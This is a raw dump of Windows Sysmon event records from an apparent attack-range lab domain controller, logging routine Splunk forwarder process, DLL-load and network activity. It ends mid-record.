13:04:51.209{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x800000000000000099452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.209{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:51.210{326FD73D-C0F3-6294-3D0B-000000005502}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000099550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:48.980{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53333-false10.0.1.12-8000- 23542300x800000000000000099549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.365{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE585F045C04BC829EFDFA19934993D9,SHA256=37C5DC2EF25C5556F155813DD513EE3C8492032C1038B320D356B35B4150D057,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.271{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.256{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.256{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x800000000000000099531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.068{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 